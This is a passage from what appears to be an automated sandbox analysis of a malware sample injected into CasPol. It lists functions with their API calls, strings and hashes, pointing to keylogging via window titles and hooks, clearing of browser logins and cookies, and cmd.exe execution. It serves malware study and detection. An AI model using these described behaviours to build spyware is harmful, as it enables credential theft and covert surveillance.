                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                            • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                            • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                            • String ID: `@
                                                                                                            • API String ID: 2583163307-951712118
                                                                                                            • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                            • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                            • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                            • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                            Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventHandleObjectSingleWait
                                                                                                            • String ID: Connection Timeout
                                                                                                            • API String ID: 2055531096-499159329
                                                                                                            • Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                            • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                            • Opcode Fuzzy Hash: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                            • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                            Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                              • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                              • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                            • String ID: bad locale name
                                                                                                            • API String ID: 3628047217-1405518554
                                                                                                            • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                            • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                            • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                            • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                            Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExecuteShell
                                                                                                            • String ID: /C $cmd.exe$open
                                                                                                            • API String ID: 587946157-3896048727
                                                                                                            • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                            • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                            • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                            • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                            Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                            • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                            • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: TerminateThread$HookUnhookWindows
                                                                                                            • String ID: pth_unenc
                                                                                                            • API String ID: 3123878439-4028850238
                                                                                                            • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                            • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                            • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                            • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                            Function 00401430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: GetCursorInfo$User32.dll
                                                                                                            • API String ID: 1646373207-2714051624
                                                                                                            • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                            • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                            • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                            • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                            Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: GetLastInputInfo$User32.dll
                                                                                                            • API String ID: 2574300362-1519888992
                                                                                                            • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                            • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                            • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                            • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                            Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1036877536-0
                                                                                                            • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                            • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                            • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                            • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                            Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                            • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                            • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                            • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                            Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                            • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                            • API String ID: 3472027048-1236744412
                                                                                                            • Opcode ID: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                            • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                            • Opcode Fuzzy Hash: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                            • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                            Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQuerySleepValue
                                                                                                            • String ID: @CG$exepath$BG
                                                                                                            • API String ID: 4119054056-3221201242
                                                                                                            • Opcode ID: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                            • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                            • Opcode Fuzzy Hash: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                            • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                            Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                              • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                              • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Window$SleepText$ForegroundLength
                                                                                                            • String ID: [ $ ]
                                                                                                            • API String ID: 3309952895-93608704
                                                                                                            • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                            • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                            • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                            • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                            Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                                                                            • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                            • Opcode Fuzzy Hash: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                                                                            • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                            Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                                                                            • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                            • Opcode Fuzzy Hash: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                                                                            • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                            Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                              • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                              • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                            • String ID:
                                                                                                            • API String ID: 737400349-0
                                                                                                            • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                            • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                            • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                            • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                            Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                            • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3177248105-0
                                                                                                            • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                            • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                            • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                            • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                            Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandleReadSize
                                                                                                            • String ID:
                                                                                                            • API String ID: 3919263394-0
                                                                                                            • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                            • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                            • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                            • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                            Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 4116985748-0
                                                                                                            • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                            • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                            • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                            • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                            Function 0041B37D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleOpenProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 39102293-0
                                                                                                            • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                            • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                            • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                            • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                            Function 00441EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorHandling__start
                                                                                                            • String ID: pow
                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                            • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                            • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                                            • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                            • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                                            Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Info
                                                                                                            • String ID: $fD
                                                                                                            • API String ID: 1807457897-3092946448
                                                                                                            • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                            • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                            • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                            • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                            Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ACP$OCP
                                                                                                            • API String ID: 0-711371036
